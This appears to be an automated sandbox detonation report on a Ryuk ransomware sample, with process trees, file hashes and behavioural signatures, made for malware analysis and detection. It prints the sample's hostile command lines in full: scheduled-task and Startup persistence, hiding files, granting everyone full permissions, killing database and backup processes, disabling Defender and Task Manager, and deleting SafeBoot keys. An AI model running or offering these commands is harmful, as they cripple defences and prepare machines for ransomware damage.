N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 860 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 840 wrote to memory of 2044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 840 wrote to memory of 2044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 840 wrote to memory of 2044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 860 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 1528 wrote to memory of 588 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1528 wrote to memory of 588 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1528 wrote to memory of 588 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 860 wrote to memory of 332 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 332 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 332 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 332 wrote to memory of 596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 332 wrote to memory of 596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 332 wrote to memory of 596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 860 wrote to memory of 612 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 612 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 612 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 612 wrote to memory of 1516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 612 wrote to memory of 1516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 612 wrote to memory of 1516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 860 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 528 wrote to memory of 1732 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 528 wrote to memory of 1732 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 528 wrote to memory of 1732 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 860 wrote to memory of 700 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 700 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 700 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 700 wrote to memory of 1784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 700 wrote to memory of 1784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 700 wrote to memory of 1784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 860 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 1376 wrote to memory of 460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1376 wrote to memory of 460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1376 wrote to memory of 460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 860 wrote to memory of 288 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 288 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 288 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 288 wrote to memory of 1012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 288 wrote to memory of 1012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 288 wrote to memory of 1012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 540 wrote to memory of 304 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 540 wrote to memory of 304 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 540 wrote to memory of 304 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1432 wrote to memory of 1192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe

"C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

cmd.exe /c taskkill /t /f /im sql*

C:\Windows\system32\taskkill.exe

taskkill /f /t /im veeam*

C:\Windows\system32\icacls.exe

icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2

C:\Windows\system32\taskkill.exe

taskkill /t /f /im sql*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\reg.exe

reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\reg.exe

reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

Network

N/A

Files

memory/840-54-0x0000000000000000-mapping.dmp

memory/2044-55-0x0000000000000000-mapping.dmp

memory/1736-56-0x0000000000000000-mapping.dmp

C:\ProgramData\ryuk.exe

MD5 a650d5676dc2c91a3af2216044ddaf8c
SHA1 851eea629fda6f930ebfd7ac45de5e8bc3f506b5
SHA256 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6
SHA512 463c54b4fc50ccfe889ab797339afa3f9096c53f8e551a616829b655f218238f53fc9aa9e6908675fed6be8883a555831af4ae1cc348eb80e937f27b34c760c7

memory/268-58-0x0000000000000000-mapping.dmp

memory/1528-59-0x0000000000000000-mapping.dmp

memory/588-60-0x0000000000000000-mapping.dmp

memory/332-61-0x0000000000000000-mapping.dmp

memory/596-62-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

MD5 a650d5676dc2c91a3af2216044ddaf8c
SHA1 851eea629fda6f930ebfd7ac45de5e8bc3f506b5
SHA256 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6
SHA512 463c54b4fc50ccfe889ab797339afa3f9096c53f8e551a616829b655f218238f53fc9aa9e6908675fed6be8883a555831af4ae1cc348eb80e937f27b34c760c7

memory/612-64-0x0000000000000000-mapping.dmp

memory/1516-65-0x0000000000000000-mapping.dmp

memory/528-66-0x0000000000000000-mapping.dmp

memory/1732-67-0x0000000000000000-mapping.dmp

memory/700-68-0x0000000000000000-mapping.dmp

memory/1784-69-0x0000000000000000-mapping.dmp

memory/1376-70-0x0000000000000000-mapping.dmp

memory/460-71-0x0000000000000000-mapping.dmp

memory/288-72-0x0000000000000000-mapping.dmp

memory/1012-73-0x0000000000000000-mapping.dmp

memory/540-74-0x0000000000000000-mapping.dmp

memory/1432-75-0x0000000000000000-mapping.dmp

memory/304-76-0x0000000000000000-mapping.dmp

memory/1192-77-0x0000000000000000-mapping.dmp

memory/1944-79-0x0000000000000000-mapping.dmp

memory/1660-78-0x0000000000000000-mapping.dmp

memory/2012-80-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\hrmlog1

MD5 bf3dc7e7792a2b38f146440ad4f79a22
SHA1 a323a963c8efbd3480399611c34bd38a0c8f6721
SHA256 f4d7c30ba27ee50ca45ee00ab69fc3462c996f3a7834065fa87b79843c8a7b41
SHA512 04cc52de3b394400dbafcdc781f9c0be32dc351ef45c9bc8efaaa76a74eadbbdf4b218b79ade19a53aa636a7c6031b4260177665e835beea3c52eaed726dd805

memory/2024-83-0x0000000000000000-mapping.dmp

C:\ProgramData\hrmlog1

MD5 bf3dc7e7792a2b38f146440ad4f79a22
SHA1 a323a963c8efbd3480399611c34bd38a0c8f6721
SHA256 f4d7c30ba27ee50ca45ee00ab69fc3462c996f3a7834065fa87b79843c8a7b41
SHA512 04cc52de3b394400dbafcdc781f9c0be32dc351ef45c9bc8efaaa76a74eadbbdf4b218b79ade19a53aa636a7c6031b4260177665e835beea3c52eaed726dd805

memory/1912-84-0x0000000000000000-mapping.dmp

C:\ProgramData\hrmlog2

MD5 9dbd99471b38780584934dce1c838dc8
SHA1 8826b382ab74a575991fc5a5747bea695913199b
SHA256 02c6fdbb283fb9236e42ab6a98a64dbaf487fa5d888727d88a90f7ff6dcd378a
SHA512 01f54374959431e106c57d6389e361cb58ea60b9b99ab52f7bf3746dd63115e74a46f7bb741f8494d0b7b9be944f9ac358690f248d4a036cde7c0c48e388e46b

memory/1568-87-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\hrmlog2

MD5 9dbd99471b38780584934dce1c838dc8
SHA1 8826b382ab74a575991fc5a5747bea695913199b
SHA256 02c6fdbb283fb9236e42ab6a98a64dbaf487fa5d888727d88a90f7ff6dcd378a
SHA512 01f54374959431e106c57d6389e361cb58ea60b9b99ab52f7bf3746dd63115e74a46f7bb741f8494d0b7b9be944f9ac358690f248d4a036cde7c0c48e388e46b

C:\Users\Admin\AppData\Local\Temp\RYUKID

MD5 f7c9aa8109768d75ea7402cb915b51be
SHA1 cc649a88c2266ae98c2c378a138329e9dcf1832a
SHA256 a2ed9868223619ce158c30a1701f34935ff847d72a72b970be812bc91b5440fa
SHA512 bc70b35f2a6feecb023aad2541cd2f5a838deff88d09fbd5217f27766c845c44c2fdfa01d441a8fb130201771ddd273bf73c982388970783133e7960a7e8c4c7

C:\ProgramData\hrmlog2

MD5 9dbd99471b38780584934dce1c838dc8
SHA1 8826b382ab74a575991fc5a5747bea695913199b
SHA256 02c6fdbb283fb9236e42ab6a98a64dbaf487fa5d888727d88a90f7ff6dcd378a
SHA512 01f54374959431e106c57d6389e361cb58ea60b9b99ab52f7bf3746dd63115e74a46f7bb741f8494d0b7b9be944f9ac358690f248d4a036cde7c0c48e388e46b

C:\ProgramData\RYUKID

MD5 f7c9aa8109768d75ea7402cb915b51be
SHA1 cc649a88c2266ae98c2c378a138329e9dcf1832a
SHA256 a2ed9868223619ce158c30a1701f34935ff847d72a72b970be812bc91b5440fa
SHA512 bc70b35f2a6feecb023aad2541cd2f5a838deff88d09fbd5217f27766c845c44c2fdfa01d441a8fb130201771ddd273bf73c982388970783133e7960a7e8c4c7

memory/1648-91-0x0000000000000000-mapping.dmp

C:\ProgramData\hrmlog1

MD5 bf3dc7e7792a2b38f146440ad4f79a22
SHA1 a323a963c8efbd3480399611c34bd38a0c8f6721
SHA256 f4d7c30ba27ee50ca45ee00ab69fc3462c996f3a7834065fa87b79843c8a7b41
SHA512 04cc52de3b394400dbafcdc781f9c0be32dc351ef45c9bc8efaaa76a74eadbbdf4b218b79ade19a53aa636a7c6031b4260177665e835beea3c52eaed726dd805

memory/1420-93-0x0000000000000000-mapping.dmp

C:\ProgramData\RyukReadMe.txt

MD5 e5776afce2e7d6fa4feb7a0c4bc2e004
SHA1 8b3cd15a7e34d4b1c0800dad92a07c60647f44dd
SHA256 4ce8d384cf4f82223dde53c4fe9e9e4a249140068ecc9146b6d68c14278a3be7
SHA512 d03dafeae3ccced40bc20dcbc5cfffc13ec01b163d0d7ff5291c088f3e56971645837a0f3405c32fc6467a2d39d2396645b3eac0b2076d88a3110c42b53cd7c6

memory/1892-95-0x0000000000000000-mapping.dmp

memory/2004-96-0x0000000000000000-mapping.dmp

memory/1036-97-0x0000000000000000-mapping.dmp

memory/580-98-0x0000000000000000-mapping.dmp

memory/1040-99-0x0000000000000000-mapping.dmp

memory/1728-100-0x0000000000000000-mapping.dmp

memory/1384-101-0x0000000000000000-mapping.dmp

memory/1528-102-0x0000000000000000-mapping.dmp

memory/860-103-0x000007FEFB741000-0x000007FEFB743000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-10-20 15:40

Reported

2022-10-20 15:43

Platform

win10v2004-20220901-en

Max time kernel

150s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe"

Signatures

Ryuk

ransomware ryuk

Clears Windows event logs

evasion ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
